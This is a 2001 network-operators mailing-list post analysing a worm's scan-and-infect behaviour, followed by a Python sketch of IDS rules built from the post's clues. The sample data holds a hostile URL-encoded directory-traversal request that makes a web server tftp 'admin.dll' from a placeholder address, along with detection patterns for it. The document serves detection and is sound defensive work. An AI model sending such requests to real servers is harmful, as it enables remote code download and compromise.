nanog mailing list archives
Re: Worm probes
From: Chris Grout <cgrout () chrisgrout com>
Date: Tue, 18 Sep 2001 08:52:37 -0700
Appears that if it gets a 404 back from its initial unicode scans, it just keeps looking elsewhere. If the server responds with anything other than a 404 (such as a 403 IP Rejected, in this case...), it attempts to get the server to tftp a file named "admin.dll" from the scanning system.
I pulled the admin.dll from an infected box and to my non-programming eyes, it appears to do at least the following (in no order):
1. Adds the guest account to the local Administrators group and then activates the account
2. Use the anonymous
3. Makes sure c$ is shared
4. Tries to mail a bunch of files. HELO it uses is aabbcc. <*** Might be able to use this for a quick and dirty IDS Sig***>
5. Looks like admin.dll ends up in "c", "d" and "e".
6. Creates a file named readme.exe which is actually a wav file (weird?)
I could be totally wrong here (and probably am) but oh well...
Chris
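The "quick and dirty IDS sig" idea from the post, written out as an added example (this is not code from the post or the list, and it assumes a log format the post never shows): two string-match rules run over a few constructed log lines, one for the SMTP greeting "HELO aabbcc", one for an HTTP request that tries to make the web server tftp "admin.dll" from the scanner. The request line and IP address in the sample data are made up for the example; the %-decoding step is there because the worm's command is carried URL-encoded in the request path.

```python
import re
from urllib.parse import unquote

# Rule 1: the worm's mailer greets with HELO/EHLO "aabbcc" (from the post).
SMTP_HELO_RE = re.compile(r'^(HELO|EHLO)\s+aabbcc\s*$', re.IGNORECASE)

# Rule 2: a request that asks the server to tftp "admin.dll" (from the post).
# Matched against the %-decoded request line so encoded spaces do not hide it.
HTTP_TFTP_RE = re.compile(r'tftp.*admin\.dll', re.IGNORECASE)


def match_smtp_helo(line: str) -> bool:
    """True if an SMTP command line is the worm's HELO/EHLO greeting."""
    return SMTP_HELO_RE.match(line.strip()) is not None


def match_http_tftp(request_line: str) -> bool:
    """True if an HTTP request line tries to make the server tftp admin.dll."""
    decoded = unquote(request_line)  # %20 -> space, etc.; bad bytes are replaced, not raised
    return HTTP_TFTP_RE.search(decoded) is not None


def scan(lines):
    """Return a list of (line_number, rule_name) for every line that trips a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        if match_smtp_helo(line):
            hits.append((n, "worm-helo-aabbcc"))
        elif match_http_tftp(line):
            hits.append((n, "worm-tftp-admin-dll"))
    return hits


# Constructed sample traffic for the example; the request path, host name and
# address are assumptions, not captures from the list.
SAMPLE_LINES = [
    "HELO aabbcc",
    "EHLO mail.example.net",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20admin.dll HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
]

if __name__ == "__main__":
    for line_no, rule in scan(SAMPLE_LINES):
        print(f"line {line_no}: {rule}")
```

The fifth sample line (a plain "dir" through a previously dropped root.exe) is deliberately left unmatched: the post only ties admin.dll and the aabbcc HELO to this worm, so the rules stay that narrow rather than flagging every command-execution probe.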